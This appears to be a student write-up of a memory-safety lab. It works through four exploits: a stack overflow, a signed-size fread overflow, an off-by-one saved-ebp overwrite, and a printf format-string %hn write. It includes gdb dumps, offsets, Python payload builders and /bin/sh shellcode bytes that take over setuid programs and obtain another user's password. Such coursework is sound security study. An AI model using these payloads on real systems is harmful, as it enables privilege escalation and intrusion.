## Q1. “Behind the Scenes”
The function `deja_vu()`, declared and called in the program `dejavu`, has a character buffer that is filled from user input, which introduces a stack overflow vulnerability that an attacker can take advantage of. With the exploit script Neo provided, we can feed `dejavu` a carefully designed input that overwrites the return address of `deja_vu()` and injects code into memory above `deja_vu()`'s stack frame. The goal is that when `deja_vu()` returns, the program is redirected to execute our injected code. Because `dejavu` has its setuid bit set and is owned by the user of the next stage, Smith, the injected code runs at Smith's access level.
To apply this plan and exploit the program, we first need to determine the offset between the buffer we are attacking and the location where the return address is stored. The return address itself is the address of the instruction immediately following the call to `deja_vu()`. Disassembling the code locates this call at around `0xb7ffc4ce`, so the return address saved while `deja_vu()` executes lies just past it.
Now let the program continue into `deja_vu()`. Examining memory, we find that the return address to overwrite (`0xb7ffc4d3`) is stored at `0xbffffa88+4=0xbffffa8c`, which is 5 words (20 bytes) past the beginning of the buffer `door` at `0xbffffa78`. With that, we assemble an input that first fills the 20 bytes below the return address with arbitrary values, then overwrites the return address with the address one word beyond where it is stored (`0xbffffa8c+4=0xbffffa90`), and finally places the shellcode there. Because x86 is little-endian, the replacement address `0xbffffa90` must be written with its bytes in reverse order, `\x90\xfa\xff\xbf`.
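The input layout described above can be sketched in Python. This is a minimal illustration rather than the actual exploit script: the function name `build_payload` and the filler byte `A` are hypothetical, the shellcode is passed in as a parameter, and the addresses are the ones read from gdb in this writeup.

```python
import struct

BUF_ADDR = 0xbffffa78          # start of the buffer `door`, as read in gdb
RET_SLOT_OFFSET = 5 * 4        # 5 words (20 bytes) from the buffer to the saved return address
SHELLCODE_ADDR = BUF_ADDR + RET_SLOT_OFFSET + 4   # first byte after the return-address slot


def build_payload(shellcode: bytes) -> bytes:
    """Filler up to the return address, new return address, then the shellcode."""
    padding = b"A" * RET_SLOT_OFFSET              # arbitrary filler values
    new_ret = struct.pack("<I", SHELLCODE_ADDR)   # "<I" = 32-bit little-endian
    return padding + new_ret + shellcode
```

`struct.pack("<I", ...)` takes care of the byte reversal, so the address can be written in its natural form in the script.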
After feeding this input to `dejavu`, we are able to run dumb-shell at Smith's access level and obtain his user name and password.
The screenshot below shows the memory layout during the exploit. The return address `0xb7ffc4d3` is replaced with `0xbffffa90`, where the shellcode resides.
## Q2. Compromising Further
The agent-smith program has a bug around lines 16-18. The first byte read, which is supposed to give the number of characters to read into the buffer `msg`, is assigned to the 8-bit signed integer `size`. If `size` holds a negative number, the following `if` statement does not detect it. When the negative `size` is then passed to `fread()`, it is converted to a very large unsigned value, which allows a stack-smashing attack. An attacker can overwrite the return address through the buffer `msg`, inject malicious code, and make the program jump to the injected code.
The return address is essentially the address of the instruction after the call to `display()` in `main()`.
We inspect the stack frame in `display()` using gdb:
The saved eip tells us the return address we want to overwrite is 0x400775.
This address is stored at `0xbffffa58+4(bytes)`, which is `4*9+1=37` words away from the head of the buffer msg.
We inject the shellcode right after the replacement for the return address, so the return address should be changed to `0xbffffa58+8=0xbffffa60`.
With this information, we are ready to prepare an input buffer and launch the attack. The input begins with `37 words = 148 chars` to fill the space between `&msg` and the saved return address, then overwrites the return address with `0xbffffa60`, and ends with the shellcode. To determine the first character, we calculate the size of the buffer needed, which is `148 + 4(new return address) + 39(shellcode) = 191`. The unsigned binary representation of 191 is `10111111`, so the leading character should be `\xbf`. Read as a signed 8-bit integer, `\xbf` is negative (-65), which is what lets it slip past the size check.
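The size arithmetic can be checked with a short Python sketch. It assumes a 32-bit `size_t` (consistent with the 32-bit addresses seen in gdb); `build_input` and the filler byte are hypothetical names chosen for illustration, not the original exploit script.

```python
import struct

FILL = 37 * 4          # bytes between msg and the saved return address
RET_LEN = 4            # the new return address
SHELLCODE_LEN = 39     # length of the shellcode

total = FILL + RET_LEN + SHELLCODE_LEN           # number of bytes fread() must copy
size_byte = bytes([total])                       # the leading character of the input
as_signed = struct.unpack("b", size_byte)[0]     # how an 8-bit signed `size` sees it
as_size_t = as_signed % 2**32                    # ASSUMPTION: 32-bit size_t conversion

new_ret = struct.pack("<I", 0xbffffa58 + 8)      # little-endian address of the shellcode


def build_input(shellcode: bytes) -> bytes:
    """Size byte, filler, new return address, shellcode."""
    if len(shellcode) != SHELLCODE_LEN:
        raise ValueError("size byte was computed for a 39-byte shellcode")
    return size_byte + b"A" * FILL + new_ret + shellcode
```

Here `total` is 191, `size_byte` is `b"\xbf"`, `as_signed` is -65, and `as_size_t` is 4294967231, far more than the 191 bytes actually supplied, so `fread()` simply reads everything we send.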
Below is the frame info and stack layout showing our attack in process. The return address is modified as planned.
## Q3
The `for` loop in function `flip()` lets index `i` run from 0 up to and including 64, which makes it possible to overwrite the least significant byte of the previous frame's `ebp` stored right above the 64-byte buffer. To exploit this program, we need to:
- Inject shellcode into memory and know the address.
- Construct a buffer of length 65 that (1) replaces the least significant byte of the stored `ebp` so that, once restored, the `ebp` register holds an address inside the buffer, and (2) stores the address of our shellcode in the buffer at that location.
The shellcode can be injected through the environment variable `ENV`. We used gdb to find the address of the injected code, which is `0xbfffff8f`. This is the address we want the program to jump to.
```
(gdb) info variables environ
All variables matching regular expression "environ":
File src/env/__environ.c:
char **__environ;
(gdb) x/s *((char **)__environ)
0xbffffbfe: "SHLVL=1"
(gdb) x/s *((char **)__environ+2)
0xbfffff8b: "ENV=j1X̀\211É\301jFX̀1\300Ph//shh/binT[PS\211\341\061Ұ\v̀"
(gdb) x/s *((char **)__environ+2)+4
0xbfffff8f: "j1X̀\211É\301jFX̀1\300Ph//shh/binT[PS\211\341\061Ұ\v̀"
```
Because `flip()` flips one bit of every character in the buffer, this address has to be supplied as `0x9fdfdfaf`, as shown below:
```
original: b 1011   f 1111   f 1111   f 1111   f 1111   f 1111   8 1000   f 1111
flipped, byte by byte:
1011 1111 => 1001 1111 => 9f
1111 1111 => 1101 1111 => df
1111 1111 => 1101 1111 => df
1000 1111 => 1010 1111 => af
```
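The same conversion can be done programmatically. The sketch below assumes that `flip()` toggles bit 5 (mask `0x20`) of each byte, which is inferred from the bit patterns in the table above rather than quoted from the program source; the Python function `flip` here is only a model of that behaviour.

```python
import struct

FLIP_MASK = 0x20   # ASSUMPTION: bit 5 is the bit toggled, inferred from bf -> 9f, ff -> df, 8f -> af


def flip(data: bytes) -> bytes:
    """Model of the per-byte bit flip; applying it twice restores the input."""
    return bytes(b ^ FLIP_MASK for b in data)


shellcode_addr = 0xbfffff8f
wanted_in_memory = struct.pack("<I", shellcode_addr)   # little-endian bytes after flip() ran
to_send = flip(wanted_in_memory)                       # bytes to place in the input
```

`to_send` is `b"\xaf\xdf\xdf\x9f"`, that is, `0x9fdfdfaf` written in little-endian byte order.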
Inspecting the address space while executing `flip()`, we find that the previous frame's saved `ebp` is stored at address `0xbffffa20`.
```
(gdb) x/20xw buf
0xbffff9e0: 0x00000000 0x00000001 0x00000000 0xbffffb8b
0xbffff9f0: 0x00000000 0x00000000 0x00000000 0xb7ffc44e
0xbffffa00: 0x00000000 0xb7ffefd8 0xbffffac0 0xb7ffc165
0xbffffa10: 0x00000000 0x00000000 0x00000000 0xb7ffc6dc
0xbffffa20: 0xbffffa2c 0xb7ffc539 0xbffffbbd 0xbffffa38
```
The input is constructed by concatenating 64 bytes made of the repeated 4-byte sequence `\xaf\xdf\xdf\x9f` (16 copies of `0x9fdfdfaf` in little-endian order) and one final byte that sets the least significant byte of the stored `ebp` to `0x04`. After `flip()` returns, the gdb output shows that the buffer is filled with the un-flipped address and that the stored `ebp` value at `0xbffffa20` is modified as expected.
```
(gdb) x/20xw buf
0xbffff9e0: 0xbfffff8b 0xbfffff8b 0xbfffff8b 0xbfffff8b
0xbffff9f0: 0xbfffff8b 0xbfffff8b 0xbfffff8b 0xbfffff8b
0xbffffa00: 0xbfffff8b 0xbfffff8b 0xbfffff8b 0xbfffff8b
0xbffffa10: 0xbfffff8b 0xbfffff8b 0xbfffff8b 0xbfffff8b
0xbffffa20: 0xbffffa04 0xb7ffc539 0xbffffbbc 0xbffffa38
```
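Why changing a single byte is enough can be checked with a little address arithmetic. The sketch below assumes that the caller of `flip()` ends with the usual `leave; ret` epilogue (an assumption, since the caller's disassembly is not shown here), so that the return address is read from `ebp + 4`. The addresses are taken from the gdb dumps above.

```python
BUF_START = 0xbffff9e0                  # address of buf
BUF_LEN = 64
SAVED_EBP_SLOT = BUF_START + BUF_LEN    # the 65th byte lands here

saved_ebp = 0xbffffa2c                  # value stored there before the attack
new_low_byte = 0x04                     # value of the overwritten byte after flip()

# Only the least significant byte changes (it sits at the lowest address).
forged_ebp = (saved_ebp & ~0xff) | new_low_byte

# ASSUMPTION: `leave; ret` in the caller pops the return address from ebp + 4.
ret_read_from = forged_ebp + 4
lands_in_buffer = BUF_START <= ret_read_from < BUF_START + BUF_LEN
```

With these values `forged_ebp` is `0xbffffa04` and the return address is read from `0xbffffa08`, which lies inside the buffer that was filled with the address to jump to.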
Running `./exploit` then gives us access to the next stage.
## Q4
The `printf()` function in `oracle()` takes user input as its format string, which introduces a format string vulnerability. Since `printf` uses the format string to determine the number of arguments, the attacker can pass in a number of format specifiers and gain access to stack memory. `printf` also supports the `%hn` specifier, which stores the number of characters written to output so far, as a 16-bit value, at the address given by the corresponding argument. With that, we can pass in the shellcode in the buffer and overwrite the return address with the address of the shellcode.
We first determined where the buffer sits relative to `printf`'s arguments:
```
pwnable:~$ cat e1
#!/bin/bash
echo -n -e "AAAA%x %x %x %x %x %x %x"
pwnable:~$ ./e1 | ./oracle
AAAA1 20 40063c 0 280 180 41414141
```
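The marker `41414141` (`AAAA`) is printed by the seventh `%x`, so the start of the buffer is 7 argument words away from `printf()`'s format-string argument.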
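The position of the marker can also be read off the probe output mechanically. This small sketch just parses the output line shown above; the variable names are illustrative.

```python
probe_output = "AAAA1 20 40063c 0 280 180 41414141"

# Drop the echoed "AAAA" prefix, then split the space-separated %x results.
words = probe_output[len("AAAA"):].split()

# 1-based index of the %x that printed our own "AAAA" bytes back.
marker_position = words.index("41414141") + 1
```

`marker_position` evaluates to 7 for this output.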
We then found that the return address is stored at `0xbffffa8c` using `gdb`. This is the address we will write to.
```
(gdb) s
oracle () at oracle.c:4
4 {
(gdb) info frame
Stack level 0, frame at 0xbffffa90:
...
ebx at 0xbffffa84, ebp at 0xbffffa88, eip at 0xbffffa8c
```
To avoid writing far too many characters to standard output, we write the shellcode address in two 16-bit halves with `%hn`: the higher half goes to `0xbffffa8c+2=0xbffffa8e` and the lower half to `0xbffffa8c`. Because the character count stored by `%hn` only increases, the half with the smaller value has to be written first, which here is the higher half. We also need a placeholder word between the two addresses: the padded `%x` that prints the extra characters making up the difference between the two values consumes one argument, and that argument sits between the two addresses. The input string therefore takes the form `<ret address+2>%o%o<ret address><shellcode>%o%o%o%00000x%hn%00000x%hn`, where the two `00000` widths are filled in below.
Now we can find the shellcode address, which is `&string+3*4=0xbffffa38`:
```
Breakpoint 1, oracle () at oracle.c:9
9 }
(gdb) x/24xw &string
0xbffffa2c: 0xbffffa8e 0x6f256f25 0xbffffa8c 0xcd58316a
0xbffffa3c: 0x89c38980 0x58466ac1 0xc03180cd 0x2f2f6850
0xbffffa4c: 0x2f686873 0x546e6962 0x8953505b 0xb0d231e1
0xbffffa5c: 0x2580cd0b 0x256f256f 0x3030256f 0x78303030
0xbffffa6c: 0x256e6825 0x30303030 0x68257830 0x0000006e
0xbffffa7c: 0xfe96c04d 0x00000000 0xb7ffcf5c 0xbffffa98
```
Now we can calculate the padding widths: `bfff=>49151` and `fa38=>64056`. With 63 characters already printed, we have to write `49151-63=49088` more characters before writing `bfff`, and `64056-49151=14905` more characters before writing `fa38`.
Inspecting the stack after filling in these two widths and sending the input string to the program, we can see that the location holding the return address is correctly overwritten with the address of the shellcode.
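The two widths, and the count of characters already printed, can be reproduced with a short Python sketch. It assumes that the five stack words consumed by the `%o` specifiers are the same ones seen in the `%x` probe earlier (`1 20 40063c 0 280`); that is an assumption made for this check, not something shown in the exploit run. `build_format_string` is a hypothetical helper, not the original script.

```python
import struct

RET_SLOT = 0xbffffa8c                  # where oracle()'s return address is stored
STRING_ADDR = 0xbffffa2c               # &string, from the gdb dump
SHELLCODE_ADDR = STRING_ADDR + 3 * 4   # shellcode follows two addresses and "%o%o"
SHELLCODE_LEN = 39

high = SHELLCODE_ADDR >> 16            # written first (smaller value)
low = SHELLCODE_ADDR & 0xffff          # written second

# ASSUMPTION: the %o specifiers print the same stack words as the %x probe.
PROBE_WORDS = [0x1, 0x20, 0x40063c, 0x0, 0x280]
printed_before = (
    4 + sum(len(format(w, "o")) for w in PROBE_WORDS[:2])    # address + "%o%o"
    + 4 + SHELLCODE_LEN                                      # address + shellcode
    + sum(len(format(w, "o")) for w in PROBE_WORDS[2:])      # "%o%o%o"
)

first_pad = high - printed_before      # width of the first padded %x
second_pad = low - high                # width of the second padded %x


def build_format_string(shellcode: bytes) -> bytes:
    """<ret+2> %o%o <ret> <shellcode> %o%o%o %<pad>x %hn %<pad>x %hn"""
    head = struct.pack("<I", RET_SLOT + 2) + b"%o%o" + struct.pack("<I", RET_SLOT)
    tail = f"%o%o%o%{first_pad}x%hn%{second_pad}x%hn".encode()
    return head + shellcode + tail
```

Under that assumption `printed_before` comes out to 63, which gives widths of 49088 and 14905.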
```
(gdb) x 0xbffffa8c
0xbffffa8c: 0xbffffa38
(gdb) x/39x 0xbffffa38
0xbffffa38: 0x6a 0x31 0x58 0xcd 0x80 0x89 0xc3 0x89
0xbffffa40: 0xc1 0x6a 0x46 0x58 0xcd 0x80 0x31 0xc0
0xbffffa48: 0x50 0x68 0x2f 0x2f 0x73 0x68 0x68 0x2f
0xbffffa50: 0x62 0x69 0x6e 0x54 0x5b 0x50 0x53 0x89
0xbffffa58: 0xe1 0x31 0xd2 0xb0 0x0b 0xcd 0x80
```